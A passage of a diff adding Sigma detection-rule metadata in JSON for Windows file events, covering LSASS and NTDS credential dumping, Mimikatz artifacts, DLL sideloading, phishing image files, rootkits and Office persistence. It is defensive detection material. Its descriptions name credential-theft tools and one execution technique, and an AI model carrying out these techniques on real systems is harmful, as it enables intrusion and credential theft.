malicious DLL file (“iphlpapi.dll”) is sideloaded\n", + "meta": { + "author": "frack113", + "creation_date": "2022/08/12", + "falsepositive": [ + "Unknown" + ], + "filename": "file_event_win_iphlpapi_dll_sideloading.yml", + "level": "high", + "logsource.category": "file_event", + "logsource.product": "windows", + "refs": [ + "https://blog.cyble.com/2022/07/27/targeted-attacks-being-carried-out-via-dll-sideloading/", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/file/file_event/file_event_win_iphlpapi_dll_sideloading.yml" + ], + "tags": [ + "attack.persistence", + "attack.privilege_escalation", + "attack.defense_evasion", + "attack.t1574.002" + ] + }, + "uuid": "1908fcc1-1b92-4272-8214-0fbaf2fa5163", + "value": "Malicious DLL File Dropped in the Teams or OneDrive Folder" + }, + { + "description": "Detects the creation of a ISO file in the Outlook temp folder or in the Appdata temp folder. Typical of Qakbot TTP from end-July 2022.", + "meta": { + "author": "@sam0x90", + "creation_date": "2022/07/30", + "falsepositive": [ + "Potential FP by sysadmin opening a zip file containing a legitimate ISO file" + ], + "filename": "file_event_win_iso_file_mount.yml", + "level": "high", + "logsource.category": "file_event", + "logsource.product": "windows", + "refs": [ + "https://twitter.com/Sam0x90/status/1552011547974696960", + "https://securityaffairs.co/wordpress/133680/malware/dll-sideloading-spread-qakbot.html", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/file/file_event/file_event_win_iso_file_mount.yml" + ], + "tags": [ + "attack.initial_access", + "attack.t1566.001" + ] + }, + "uuid": "2f9356ae-bf43-41b8-b858-4496d83b2acb", + "value": "ISO File Created Within Temp Folders" + }, + { + "description": "Detects the creation of recent element file that points to an .ISO, .IMG, .VHD or .VHDX file as often used in phishing attacks.\nThis can be a false positive on server systems but on workstations users should rarely mount .iso or .img files.\n", + "meta": { + "author": "Florian Roth", + "creation_date": "2022/02/11", + "falsepositive": [ + "Cases in which a user mounts an image file for legitimate reasons" + ], + "filename": "file_event_win_iso_file_recent.yml", + "level": "medium", + "logsource.category": "file_event", + "logsource.product": "windows", + "refs": [ + "https://www.microsoft.com/security/blog/2021/05/27/new-sophisticated-email-based-attack-from-nobelium/", + "https://www.trendmicro.com/vinfo/us/security/news/cybercrime-and-digital-threats/malicious-spam-campaign-uses-iso-image-files-to-deliver-lokibot-and-nanocore", + "https://blog.emsisoft.com/en/32373/beware-new-wave-of-malware-spreads-via-iso-file-email-attachments/", + "https://insights.sei.cmu.edu/blog/the-dangers-of-vhd-and-vhdx-files/", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/file/file_event/file_event_win_iso_file_recent.yml" + ], + "tags": "No established tags" + }, + "uuid": "4358e5a5-7542-4dcb-b9f3-87667371839b", + "value": "ISO or Image Mount Indicator in Recent Files" + }, + { + "description": "Detects programs on a Windows system that should not write an archive to disk", + "meta": { + "author": "frack113, Florian Roth", + "creation_date": "2022/08/21", + "falsepositive": [ + "Unknown" + ], + "filename": "file_event_win_legitimate_app_dropping_archive.yml", + "level": "high", + "logsource.category": "file_event", + "logsource.product": "windows", + "refs": [ + "https://github.com/Neo23x0/sysmon-config/blob/3f808d9c022c507aae21a9346afba4a59dd533b9/sysmonconfig-export-block.xml#L1326", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/file/file_event/file_event_win_legitimate_app_dropping_archive.yml" + ], + "tags": [ + "attack.defense_evasion", + "attack.t1218" + ] + }, + "uuid": "654fcc6d-840d-4844-9b07-2c3300e54a26", + "value": "Legitimate Application Dropped Archive" + }, + { + "description": "Detects programs on a Windows system that should not write executables to disk", + "meta": { + "author": "frack113, Florian Roth", + "creation_date": "2022/08/21", + "falsepositive": [ + "Unknown" + ], + "filename": "file_event_win_legitimate_app_dropping_exe.yml", + "level": "high", + "logsource.category": "file_event", + "logsource.product": "windows", + "refs": [ + "https://github.com/Neo23x0/sysmon-config/blob/3f808d9c022c507aae21a9346afba4a59dd533b9/sysmonconfig-export-block.xml#L1326", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/file/file_event/file_event_win_legitimate_app_dropping_exe.yml" + ], + "tags": [ + "attack.defense_evasion", + "attack.t1218" + ] + }, + "uuid": "f0540f7e-2db3-4432-b9e0-3965486744bc", + "value": "Legitimate Application Dropped Executable" + }, + { + "description": "Detects programs on a Windows system that should not write scripts to disk", + "meta": { + "author": "frack113, Florian Roth", + "creation_date": "2022/08/21", + "falsepositive": [ + "Unknown" + ], + "filename": "file_event_win_legitimate_app_dropping_script.yml", + "level": "high", + "logsource.category": "file_event", + "logsource.product": "windows", + "refs": [ + "https://github.com/Neo23x0/sysmon-config/blob/3f808d9c022c507aae21a9346afba4a59dd533b9/sysmonconfig-export-block.xml#L1326", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/file/file_event/file_event_win_legitimate_app_dropping_script.yml" + ], + "tags": [ + "attack.defense_evasion", + "attack.t1218" + ] + }, + "uuid": "7d604714-e071-49ff-8726-edeb95a70679", + "value": "Legitimate Application Dropped Script" + }, + { + "description": "Detects file names used by different memory dumping tools to create a memory dump of the LSASS process memory, which contains user credentials", + "meta": { + "author": "Florian Roth", + "creation_date": "2021/11/15", + "falsepositive": [ + "Unknown" + ], + "filename": "file_event_win_lsass_dump.yml", + "level": "high", + "logsource.category": "file_event", + "logsource.product": "windows", + "refs": [ + "https://www.google.com/search?q=procdump+lsass", + "https://medium.com/@markmotig/some-ways-to-dump-lsass-exe-c4a75fdc49bf", + "https://github.com/elastic/detection-rules/blob/c76a39796972ecde44cb1da6df47f1b6562c9770/rules/windows/credential_access_lsass_memdump_file_created.toml", + "https://www.whiteoaksecurity.com/blog/attacks-defenses-dumping-lsass-no-mimikatz/", + "https://github.com/helpsystems/nanodump", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/file/file_event/file_event_win_lsass_dump.yml" + ], + "tags": [ + "attack.credential_access", + "attack.t1003.001" + ] + }, + "uuid": "a5a2d357-1ab8-4675-a967-ef9990a59391", + "value": "LSASS Process Memory Dump Files" + }, + { + "description": "LSASS memory dump creation using operating systems utilities. Procdump will use process name in output file if no name is specified", + "meta": { + "author": "Teymur Kheirkhabarov, oscd.community", + "creation_date": "2019/10/22", + "falsepositive": [ + "Dumping lsass memory for forensic investigation purposes by legitimate incident responder or forensic invetigator", + "Dumps of another process that contains lsass in its process name (substring)" + ], + "filename": "file_event_win_lsass_memory_dump_file_creation.yml", + "level": "high", + "logsource.category": "file_event", + "logsource.product": "windows", + "refs": [ + "https://www.slideshare.net/heirhabarov/hunting-for-credentials-dumping-in-windows-environment", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/file/file_event/file_event_win_lsass_memory_dump_file_creation.yml" + ], + "tags": [ + "attack.credential_access", + "attack.t1003.001" + ] + }, + "uuid": "5e3d3601-0662-4af0-b1d2-36a05e90c40a", + "value": "LSASS Memory Dump File Creation" + }, + { + "description": "Detects WerFault creating a dump file with a name that indicates that the dump file could be an LSASS process memory, which contains user credentials", + "meta": { + "author": "Florian Roth", + "creation_date": "2022/06/27", + "falsepositive": [ + "Unknown" + ], + "filename": "file_event_win_lsass_werfault_dump.yml", + "level": "high", + "logsource.category": "file_event", + "logsource.product": "windows", + "refs": [ + "https://github.com/helpsystems/nanodump", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/file/file_event/file_event_win_lsass_werfault_dump.yml" + ], + "tags": [ + "attack.credential_access", + "attack.t1003.001" + ] + }, + "uuid": "c3e76af5-4ce0-4a14-9c9a-25ceb8fda182", + "value": "WerFault LSASS Process Memory Dump" + }, + { + "description": "A office file with macro is created from a commandline or a script", + "meta": { + "author": "frack113", + "creation_date": "2022/01/23", + "falsepositive": [ + "Unknown" + ], + "filename": "file_event_win_macro_file.yml", + "level": "medium", + "logsource.category": "file_event", + "logsource.product": "windows", + "refs": [ + "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1566.001/T1566.001.md", + "https://docs.microsoft.com/en-us/deployoffice/compat/office-file-format-reference", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/file/file_event/file_event_win_macro_file.yml" + ], + "tags": [ + "attack.initial_access", + "attack.t1566.001" + ] + }, + "uuid": "b1c50487-1967-4315-a026-6491686d860e", + "value": "Dump Office Macro Files from Commandline" + }, + { + "description": "Detects javaw.exe in AppData folder as used by Adwind / JRAT", + "meta": { + "author": "Florian Roth, Tom Ueltschi, Jonhnathan Ribeiro, oscd.community", + "creation_date": "2017/11/10", + "falsepositive": "No established falsepositives", + "filename": "file_event_win_mal_adwind.yml", + "level": "high", + "logsource.category": "file_event", + "logsource.product": "windows", + "refs": [ + "https://www.hybrid-analysis.com/sample/ba86fa0d4b6af2db0656a88b1dd29f36fe362473ae8ad04255c4e52f214a541c?environmentId=100", + "https://www.first.org/resources/papers/conf2017/Advanced-Incident-Detection-and-Threat-Hunting-using-Sysmon-and-Splunk.pdf", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/file/file_event/file_event_win_mal_adwind.yml" + ], + "tags": [ + "attack.execution", + "attack.t1059.005", + "attack.t1059.007" + ] + }, + "uuid": "0bcfabcb-7929-47f4-93d6-b33fb67d34d1", + "value": "Adwind RAT / JRAT File Artifact" + }, + { + "description": "Detects Octopus Scanner Malware.", + "meta": { + "author": "NVISO", + "creation_date": "2020/06/09", + "falsepositive": [ + "Unknown" + ], + "filename": "file_event_win_mal_octopus_scanner.yml", + "level": "high", + "logsource.category": "file_event", + "logsource.product": "windows", + "refs": [ + "https://securitylab.github.com/research/octopus-scanner-malware-open-source-supply-chain", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/file/file_event/file_event_win_mal_octopus_scanner.yml" + ], + "tags": [ + "attack.t1195", + "attack.t1195.001" + ] + }, + "uuid": "805c55d9-31e6-4846-9878-c34c75054fe9", + "value": "Octopus Scanner Malware" + }, + { + "description": "Malware can use mountable Virtual Hard Disk .vhd file to encapsulate payloads and evade security controls", + "meta": { + "author": "frack113, Christopher Peacock '@securepeacock', SCYTHE '@scythe_io'", + "creation_date": "2021/10/25", + "falsepositive": [ + "Legitimate user creation" + ], + "filename": "file_event_win_mal_vhd_download.yml", + "level": "medium", + "logsource.category": "file_event", + "logsource.product": "windows", + "refs": [ + "https://redcanary.com/blog/intelligence-insights-october-2021/", + "https://www.kaspersky.com/blog/lazarus-vhd-ransomware/36559/", + "https://securelist.com/lazarus-on-the-hunt-for-big-game/97757/", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/file/file_event/file_event_win_mal_vhd_download.yml" + ], + "tags": [ + "attack.resource_development", + "attack.t1587.001" + ] + }, + "uuid": "8468111a-ef07-4654-903b-b863a80bbc95", + "value": "Suspicious VHD Image Download From Browser" + }, + { + "description": "Detects the creation of files that contain Kerberos tickets based on an extension used by the popular tool Mimikatz", + "meta": { + "author": "Florian Roth", + "creation_date": "2021/11/08", + "falsepositive": [ + "Unlikely" + ], + "filename": "file_event_win_mimikatz_kirbi_file_creation.yml", + "level": "critical", + "logsource.category": "file_event", + "logsource.product": "windows", + "refs": [ + "https://cobalt.io/blog/kerberoast-attack-techniques", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/file/file_event/file_event_win_mimikatz_kirbi_file_creation.yml" + ], + "tags": [ + "attack.credential_access", + "attack.t1558" + ] + }, + "uuid": "9e099d99-44c2-42b6-a6d8-54c3545cab29", + "value": "Mimikatz Kirbi File Creation" + }, + { + "description": "Detects Mimikatz MemSSP default log file creation", + "meta": { + "author": "David ANDRE", + "creation_date": "2021/12/20", + "falsepositive": [ + "Unlikely" + ], + "filename": "file_event_win_mimimaktz_memssp_log_file.yml", + "level": "critical", + "logsource.category": "file_event", + "logsource.product": "windows", + "refs": [ + "https://pentestlab.blog/2019/10/21/persistence-security-support-provider/", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/file/file_event/file_event_win_mimimaktz_memssp_log_file.yml" + ], + "tags": [ + "attack.credential_access", + "attack.t1003" + ] + }, + "uuid": "034affe8-6170-11ec-844f-0f78aa0c4d66", + "value": "Mimikatz MemSSP Default Log File Creation" + }, + { + "description": "Detects the use of Moriya rootkit as described in the securelist's Operation TunnelSnake report", + "meta": { + "author": "Bhabesh Raj", + "creation_date": "2021/05/06", + "falsepositive": [ + "Unknown" + ], + "filename": "file_event_win_moriya_rootkit.yml", + "level": "critical", + "logsource.category": "file_event", + "logsource.product": "windows", + "refs": [ + "https://securelist.com/operation-tunnelsnake-and-moriya-rootkit/101831", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/file/file_event/file_event_win_moriya_rootkit.yml" + ], + "tags": [ + "attack.persistence", + "attack.privilege_escalation", + "attack.t1543.003" + ] + }, + "uuid": "a1507d71-0b60-44f6-b17c-bf53220fdd88", + "value": "Moriya Rootkit" + }, + { + "description": "Detects msdt.exe creating files in suspicious directories", + "meta": { + "author": "Vadim Varganov, Florian Roth", + "creation_date": "2022/08/24", + "falsepositive": [ + "Unknown" + ], + "filename": "file_event_win_msdt_autorun.yml", + "level": "high", + "logsource.category": "file_event", + "logsource.product": "windows", + "refs": [ + "https://irsl.medium.com/the-trouble-with-microsofts-troubleshooters-6e32fc80b8bd", + "https://msrc-blog.microsoft.com/2022/05/30/guidance-for-cve-2022-30190-microsoft-support-diagnostic-tool-vulnerability/", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/file/file_event/file_event_win_msdt_autorun.yml" + ], + "tags": [ + "attack.persistence", + "attack.t1547.001", + "cve.2022.30190" + ] + }, + "uuid": "318557a5-150c-4c8d-b70e-a9910e199857", + "value": "MSDT.exe Creates Files in Autorun Directory" + }, + { + "description": "Detects the creation of Usage Log files by the CLR (clr.dll). These files are named after the executing process once the assembly is finished executing for the first time in the (user) session context", + "meta": { + "author": "frack113", + "creation_date": "2022/11/18", + "falsepositive": [ + "Legitimate use" + ], + "filename": "file_event_win_net_cli_artefact.yml", + "level": "medium", + "logsource.category": "file_event", + "logsource.product": "windows", + "refs": [ + "https://bohops.com/2021/03/16/investigating-net-clr-usage-log-tampering-techniques-for-edr-evasion/", + "https://github.com/olafhartong/sysmon-modular/blob/fa1ae53132403d262be2bbd7f17ceea7e15e8c78/11_file_create/include_dotnet.xml", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/file/file_event/file_event_win_net_cli_artefact.yml" + ], + "tags": [ + "attack.defense_evasion", + "attack.t1218" + ] + }, + "uuid": "e0b06658-7d1d-4cd3-bf15-03467507ff7c", + "value": "NET CLR Binary Execution Usage Log Artifact" + }, + { + "description": "Detects the creation of suspicious files and folders inside the user's AppData folder but not inside any of the common and well known directories (Local, Romaing, LocalLow). This method could be used as a method to bypass detection who exclude the AppData folder in fear of FPs", + "meta": { + "author": "Nasreddine Bencherchali", + "creation_date": "2022/08/05", + "falsepositive": [ + "Unlikely" + ], + "filename": "file_event_win_new_files_in_uncommon_appdata_folder.yml", + "level": "high", + "logsource.category": "file_event", + "logsource.product": "windows", + "refs": [ + "Internal Research", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/file/file_event/file_event_win_new_files_in_uncommon_appdata_folder.yml" + ], + "tags": [ + "attack.defense_evasion", + "attack.execution" + ] + }, + "uuid": "d7b50671-d1ad-4871-aa60-5aa5b331fe04", + "value": "Creation Suspicious File In Uncommon AppData Folder" + }, + { + "description": "An attacker may execute an application as a .SCR File (Screensaver) using rundll32.exe desk.cpl,InstallScreenSaver", + "meta": { + "author": "Christopher Peacock @securepeacock, SCYTHE @scythe_io", + "creation_date": "2022/04/27", + "falsepositive": [ + "The installation of new screen savers." + ], + "filename": "file_event_win_new_src_file.yml", + "level": "medium", + "logsource.category": "file_event", + "logsource.product": "windows", + "refs": [ + "https://lolbas-project.github.io/lolbas/Libraries/Desk/", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/file/file_event/file_event_win_new_src_file.yml" + ], + "tags": [ + "attack.t1218.011", + "attack.defense_evasion" + ] + }, + "uuid": "c048f047-7e2a-4888-b302-55f509d4a91d", + "value": "SCR File Write Event" + }, + { + "description": "Detects creation of new \".dll\" files inside the plugins directory of a notepad++ installation by a process other than \"gup.exe\". Which could indicates possible persistence", + "meta": { + "author": "Nasreddine Bencherchali", + "creation_date": "2022/06/10", + "falsepositive": [ + "Possible FPs during first installation of Notepad++", + "Legitimate use of custom plugins to enhance notepad++ functionality by users" + ], + "filename": "file_event_win_notepad_plus_plus_persistence.yml", + "level": "medium", + "logsource.category": "file_event", + "logsource.product": "windows", + "refs": [ + "https://pentestlab.blog/2022/02/14/persistence-notepad-plugins/", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/file/file_event/file_event_win_notepad_plus_plus_persistence.yml" + ], + "tags": [ + "attack.persistence" + ] + }, + "uuid": "54127bd4-f541-4ac3-afdb-ea073f63f692", + "value": "Persistence Via Notepad++ Plugins" + }, + { + "description": "Detects suspicious creations of a file named ntds.dit, e.g. by a PowerShell parent or in a suspicious directory or a suspicious one liner", + "meta": { + "author": "Florian Roth", + "creation_date": "2022/03/11", + "falsepositive": [ + "Unknown" + ], + "filename": "file_event_win_ntds_dit.yml", + "level": "high", + "logsource.category": "file_event", + "logsource.product": "windows", + "refs": [ + "https://www.ired.team/offensive-security/credential-access-and-credential-dumping/ntds.dit-enumeration", + "https://www.n00py.io/2022/03/manipulating-user-passwords-without-mimikatz/", + "https://pentestlab.blog/tag/ntds-dit/", + "https://github.com/samratashok/nishang/blob/414ee1104526d7057f9adaeee196d91ae447283e/Gather/Copy-VSS.ps1", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/file/file_event/file_event_win_ntds_dit.yml" + ], + "tags": [ + "attack.credential_access", + "attack.t1003.003" + ] + }, + "uuid": "4e7050dd-e548-483f-b7d6-527ab4fa784d", + "value": "Suspicious NTDS.DIT Creation" + }, + { + "description": "Detects suspicious creations of files with names used in various tools that export the NTDS.DIT for exfiltration", + "meta": { + "author": "Florian Roth", + "creation_date": "2022/03/11", + "falsepositive": [ + "Unknown" + ], + "filename": "file_event_win_ntds_exfil_tools.yml", + "level": "high", + "logsource.category": "file_event", + "logsource.product": "windows", + "refs": [ + "https://github.com/rapid7/metasploit-framework/blob/eb6535009f5fdafa954525687f09294918b5398d/modules/post/windows/gather/ntds_grabber.rb", + "https://github.com/rapid7/metasploit-framework/blob/eb6535009f5fdafa954525687f09294918b5398d/data/post/powershell/NTDSgrab.ps1", + "https://github.com/SecureAuthCorp/impacket/blob/7d2991d78836b376452ca58b3d14daa61b67cb40/impacket/examples/secretsdump.py#L2405", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/file/file_event/file_event_win_ntds_exfil_tools.yml" + ], + "tags": [ + "attack.credential_access", + "attack.t1003.003" + ] + }, + "uuid": "3a8da4e0-36c1-40d2-8b29-b3e890d5172a", + "value": "Suspicious NTDS Exfil Filename Patterns" + }, + { + "description": "Detects add-ins that load when Microsoft Word or Excel starts (.wll/.xll are simply .dll fit for Word or Excel).", + "meta": { + "author": "NVISO", + "creation_date": "2020/05/11", + "falsepositive": [ + "Legitimate add-ins" + ], + "filename": "file_event_win_office_persistence.yml", + "level": "high", + "logsource.category": "file_event", + "logsource.product": "windows", + "refs": [ + "Internal Research", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/file/file_event/file_event_win_office_persistence.yml" + ], + "tags": [ + "attack.persistence", + "attack.t1137.006" + ] + }, + "uuid": "8e1cb247-6cf6-42fa-b440-3f27d57e9936", + "value": "Microsoft Office Add-In Loading" + }, + { + "description": "Detects the creation of a macro file for Outlook.\nGoes with win_outlook_c2_registry_key. VbaProject.OTM is explicitly mentioned in T1137.\nParticularly interesting if both events Registry & File Creation happens at the same time.\n", + "meta": { + "author": "@ScoubiMtl", + "creation_date": "2021/04/05", + "falsepositive": [ + "User genuinly creates a VB Macro for their email" + ], + "filename": "file_event_win_outlook_c2_macro_creation.yml", + "level": "medium", + "logsource.category": "file_event", + "logsource.product": "windows", + "refs": [ + "https://www.mdsec.co.uk/2020/11/a-fresh-outlook-on-mail-based-persistence/", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/file/file_event/file_event_win_outlook_c2_macro_creation.yml" + ], + "tags": [ + "attack.persistence", + "attack.command_and_control", + "attack.t1137", + "attack.t1008", + "attack.t1546" + ] + }, + "uuid": "8c31f563-f9a7-450c-bfa8-35f8f32f1f61", + "value": "Outlook C2 Macro Creation" + }, + { + "description": "Detects the creation of new Outlook form which can contain malicious code", + "meta": { + "author": "Tobias Michalski", + "creation_date": "2021/06/10", + "falsepositive": [ + "Unknown" + ], + "filename": "file_event_win_outlook_newform.yml", + "level": "high", + "logsource.category": "file_event", + "logsource.product": "windows", + "refs": [ + "https://twitter.com/blueteamsec1/status/1401290874202382336?s=20", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/file/file_event/file_event_win_outlook_newform.yml" + ], + "tags": [ + "attack.persistence", + "attack.t1137.003" + ] + }, + "uuid": "c3edc6a5-d9d4-48d8-930e-aab518390917", + "value": "Outlook Form Installation" + }, + { + "description": "Detects processes creating temp files related to PCRE.NET package", + "meta": { + "author": "Roberto Rodriguez (Cyb3rWard0g), OTR (Open Threat Research)", + "creation_date": "2020/10/29", + "falsepositive": [ + "Unknown" + ], + "filename": "file_event_win_pcre_net_temp_file.yml", + "level": "high", + "logsource.category": "file_event", + "logsource.product": "windows", + "refs": [ + "https://twitter.com/rbmaslen/status/1321859647091970051", + "https://twitter.com/tifkin_/status/1321916444557365248", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/file/file_event/file_event_win_pcre_net_temp_file.yml" + ], + "tags": [ + "attack.execution", + "attack.t1059" + ] + }, + "uuid": "6e90ae7a-7cd3-473f-a035-4ebb72d961da", + "value": "PCRE.NET Package Temp Files" + }, + { + "description": "Detects the use of Pingback backdoor that creates ICMP tunnel for C2 as described in the trustwave report", + "meta": { + "author": "Bhabesh Raj", + "creation_date": "2021/05/05", + "falsepositive": [ + "Very unlikely" + ], + "filename": "file_event_win_pingback_backdoor.yml", + "level": "high", + "logsource.category": "file_event", + "logsource.product": "windows", + "refs": [ + "https://www.trustwave.com/en-us/resources/blogs/spiderlabs-blog/backdoor-at-the-end-of-the-icmp-tunnel", + "https://app.any.run/tasks/4a54c651-b70b-4b72-84d7-f34d301d6406", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/file/file_event/file_event_win_pingback_backdoor.yml" + ], + "tags": [ + "attack.persistence", + "attack.t1574.001" + ] + }, + "uuid": "2bd63d53-84d4-4210-80ff-bf0658f1bf78", + "value": "Pingback Backdoor - File" + }, + { + "description": "Detects the creation of known powershell scripts for exploitation", + "meta": { + "author": "Markus Neis, Nasreddine Bencherchali, Mustafa Kaan Demir, Georg Lauenstein", + "creation_date": "2018/04/07", + "falsepositive": [ + "Unknown" + ], + "filename": "file_event_win_powershell_exploit_scripts.yml", + "level": "high", + "logsource.category": "file_event", + "logsource.product": "windows", + "refs": [ + "https://raw.githubusercontent.com/Neo23x0/sigma/f35c50049fa896dff91ff545cb199319172701e8/rules/windows/powershell/powershell_malicious_commandlets.yml", + "https://github.com/PowerShellMafia/PowerSploit", + "https://github.com/NetSPI/PowerUpSQL", + "https://github.com/CsEnox/EventViewer-UACBypass", + "https://github.com/AlsidOfficial/WSUSpendu/", + "https://github.com/nettitude/Invoke-PowerThIEf", + "https://github.com/S3cur3Th1sSh1t/WinPwn", + "https://github.com/S3cur3Th1sSh1t/PowerSharpPack/tree/master/PowerSharpBinaries", + "https://github.com/BC-SECURITY/Invoke-ZeroLogon/blob/111d17c7fec486d9bb23387e2e828b09a26075e4/Invoke-ZeroLogon.ps1", + "https://github.com/xorrior/RandomPS-Scripts/blob/848c919bfce4e2d67b626cbcf4404341cfe3d3b6/Get-DXWebcamVideo.ps1", + "https://github.com/rvrsh3ll/Misc-Powershell-Scripts/blob/6f23bb41f9675d7e2d32bacccff75e931ae00554/OfficeMemScraper.ps1", + "https://github.com/dafthack/DomainPasswordSpray/blob/b13d64a5834694aa73fd2aea9911a83027c465a7/DomainPasswordSpray.ps1", + "https://unit42.paloaltonetworks.com/threat-assessment-black-basta-ransomware/", + "https://research.nccgroup.com/2022/06/06/shining-the-light-on-black-basta/", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/file/file_event/file_event_win_powershell_exploit_scripts.yml" + ], + "tags": [ + "attack.execution", + "attack.t1059.001" + ] + }, + "uuid": "f331aa1f-8c53-4fc3-b083-cc159bc971cb", + "value": "Malicious PowerShell Commandlet Names" + }, + { + "description": "Attempts to detect PowerShell writing startup shortcuts.\nThis procedure was highlighted in Red Canary Intel Insights Oct. 2021, \"We frequently observe adversaries using PowerShell to write malicious .lnk files into the startup directory to establish persistence.\nAccordingly, this detection opportunity is likely to identify persistence mechanisms in multiple threats.\nIn the context of Yellow Cockatoo, this persistence mechanism eventually launches the command-line script that leads to the installation of a malicious DLL\"\n", + "meta": { + "author": "Christopher Peacock '@securepeacock', SCYTHE", + "creation_date": "2021/10/24", + "falsepositive": [ + "Unknown", + "Depending on your environment accepted applications may leverage this at times. It is recommended to search for anomalies inidicative of malware." + ], + "filename": "file_event_win_powershell_startup_shortcuts.yml", + "level": "high", + "logsource.category": "file_event", + "logsource.product": "windows", + "refs": [ + "https://redcanary.com/blog/intelligence-insights-october-2021/", + "https://github.com/redcanaryco/atomic-red-team/blob/36d49de4c8b00bf36054294b4a1fcbab3917d7c5/atomics/T1547.001/T1547.001.md#atomic-test-7---add-executable-shortcut-link-to-user-startup-folder", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/file/file_event/file_event_win_powershell_startup_shortcuts.yml" + ], + "tags": [ + "attack.persistence", + "attack.t1547.001" + ] + }, + "uuid": "92fa78e7-4d39-45f1-91a3-8b23f3f1088d", + "value": "PowerShell Writing Startup Shortcuts" + }, + { + "description": "Detects a dump file written by QuarksPwDump password dumper", + "meta": { + "author": "Florian Roth", + "creation_date": "2018/02/10", + "falsepositive": [ + "Unknown" + ], + "filename": "file_event_win_quarkspw_filedump.yml", + "level": "critical", + "logsource.category": "file_event", + "logsource.product": "windows", + "refs": [ + "https://jpcertcc.github.io/ToolAnalysisResultSheet/details/QuarksPWDump.htm", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/file/file_event/file_event_win_quarkspw_filedump.yml" + ], + "tags": [ + "attack.credential_access", + "attack.t1003.002" + ] + }, + "uuid": "847def9e-924d-4e90-b7c4-5f581395a2b4", + "value": "QuarksPwDump Dump File" + }, + { + "description": "Detects Rclone config file being created", + "meta": { + "author": "Aaron Greetham (@beardofbinary) - NCC Group", + "creation_date": "2021/05/26", + "falsepositive": [ + "Legitimate Rclone usage (rare)" + ], + "filename": "file_event_win_rclone_exec_file.yml", + "level": "high", + "logsource.category": "file_event", + "logsource.product": "windows", + "refs": [ + "https://research.nccgroup.com/2021/05/27/detecting-rclone-an-effective-tool-for-exfiltration/", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/file/file_event/file_event_win_rclone_exec_file.yml" + ], + "tags": [ + "attack.exfiltration", + "attack.t1567.002" + ] + }, + "uuid": "34986307-b7f4-49be-92f3-e7a4d01ac5db", + "value": "Rclone Config File Creation" + }, + { + "description": "Detects actions caused by the RedMimicry Winnti playbook", + "meta": { + "author": "Alexander Rausch", + "creation_date": "2020/06/24", + "falsepositive": [ + "Unknown" + ], + "filename": "file_event_win_redmimicry_winnti_filedrop.yml", + "level": "high", + "logsource.category": "file_event", + "logsource.product": "windows", + "refs": [ + "https://redmimicry.com", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/file/file_event/file_event_win_redmimicry_winnti_filedrop.yml" + ], + "tags": [ + "attack.defense_evasion", + "attack.t1027" + ] + }, + "uuid": "130c9e58-28ac-4f83-8574-0a4cc913b97e", + "value": "RedMimicry Winnti Playbook Dropped File" + }, + { + "description": "Detects default filenames output from the execution of CrackMapExec and Impacket-secretsdump against an endpoint.", + "meta": { + "author": "SecurityAura", + "creation_date": "2022/11/16", + "falsepositive": [ + "Unknown" + ], + "filename": "file_event_win_remote_cred_dump.yml", + "level": "high", + "logsource.category": "file_event", + "logsource.product": "windows", + "refs": [ + "https://github.com/Porchetta-Industries/CrackMapExec", + "https://github.com/SecureAuthCorp/impacket/blob/master/examples/secretsdump.py", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/file/file_event/file_event_win_remote_cred_dump.yml" + ], + "tags": [ + "attack.credential_access", + "attack.t1003" + ] + }, + "uuid": "6e2a900a-ced9-4e4a-a9c2-13e706f9518a", + "value": "Remote Credential Dump" + }, + { + "description": "Detects a phishing attack which expands a ZIP file containing a malicious shortcut. If the victim expands the ZIP file via the explorer process, then the explorer process expands the malicious ZIP file and drops a malicious shortcut redirected to a backdoor into the Startup folder. Additionally, the file name of the malicious shortcut in Startup folder contains {0AFACED1-E828-11D1-9187-B532F1E9575D} meaning the folder shortcut operation.", + "meta": { + "author": "Greg (rule)", + "creation_date": "2022/07/21", + "falsepositive": "No established falsepositives", + "filename": "file_event_win_ripzip_attack.yml", + "level": "high", + "logsource.category": "file_event", + "logsource.product": "windows", + "refs": [ + "https://twitter.com/jonasLyk/status/1549338335243534336?t=CrmPocBGLbDyE4p6zTX1cg&s=19", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/file/file_event/file_event_win_ripzip_attack.yml" + ], + "tags": [ + "attack.t1547", + "attack.persistence" + ] + }, + "uuid": "a6976974-ea6f-4e97-818e-ea08625c52cb", + "value": "RipZip Attack on Startup Folder" + }, + { + "description": "Detects the creation of files that look like exports of the local SAM (Security Account Manager)", + "meta": { + "author": "Florian Roth", + "creation_date": "2022/02/11", + "falsepositive": [ + "Rare cases of administrative activity" + ], + "filename": 